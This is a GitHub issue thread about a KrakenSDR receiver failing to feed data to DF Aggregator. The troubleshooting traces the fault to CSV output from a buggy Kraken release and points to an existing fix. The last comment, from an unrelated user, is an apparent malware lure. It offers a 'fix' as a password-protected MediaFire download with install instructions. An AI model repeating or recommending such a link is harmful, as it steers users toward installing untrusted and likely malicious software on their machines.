### ISSUE TITLE
KrakenSDR connection Issue

### ISSUE THREAD

**Issue by jaw1999** [ckoval7/df-aggregator#13]
I am running DF aggregator on my dragonOS imaged computer, and attempting to connect to my remote KrakenSDR via its Access Point. 

I run into an issue when I attempt to create the connection in DF aggregator by typing in http://<my pi’s IP>:8081/DOA_value.html, when I try to connect it comes up as unknown, and in the DF aggregator CLI I briefly see a point about failed to connect, “< expected in line 1 column 1”.

I have ensured all the ports are open, and my krakenSDR is set to DF aggregator mode. I have also gone to <my pi’s IP>:8081/DOA_value.html, and can see all of the data output. Any advice on how to fix?

**Comment by ckoval7** [comment]
If you try to browse to that URL and view the page source (ctrl+u in Chrome), what does it look like?

If everything is working correctly on the Kraken side of things it should look similar to this:
```
<DATA><STATION_ID>RX Alpha</STATION_ID><TIME>1724633412666</TIME><FREQUENCY>462.5</FREQUENCY><LOCATION><LATITUDE>38.53008</LATITUDE><LONGITUDE>-77.4456</LONGITUDE><HEADING>350.0</HEADING></LOCATION><DOA>253</DOA><PWR>55.2565</PWR><CONF>255</CONF></DATA>
```

Here is a site with simulated data for testing: http://dfsim.net/defcon30/doa_easy/

**Comment by jaw1999** [comment]
![image](https://github.com/user-attachments/assets/a70a9f23-697b-45ce-afe6-a92e5967e4d4)

**Comment by jaw1999** [comment]
![image](https://github.com/user-attachments/assets/b5a1cb9e-cb5e-49ea-a3b3-3d087cc6045b)

**Comment by jaw1999** [comment]
@ckoval7

**Comment by ckoval7** [comment]
That looks like the CSV output from Kraken, which is not compatible with DFA. I think there was a bug in one of the version of the Kraken software that output CSV even if you selected DFA in the dropdown.

**Comment by jaw1999** [comment]
Makes sense. I pulled this pi img off their GitHub. Best workaround install manually?

**Comment by alphafox02** [comment]
This issue was already figured out and I shared the solution, but now I need to find it again. It’s a matter of changing the url or something like that as the code in KrakenSDR changed.

**Comment by alphafox02** [comment]
DFA wiki needs updated 

https://github.com/krakenrf/krakensdr_doa/issues/138#issuecomment-2080405623

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
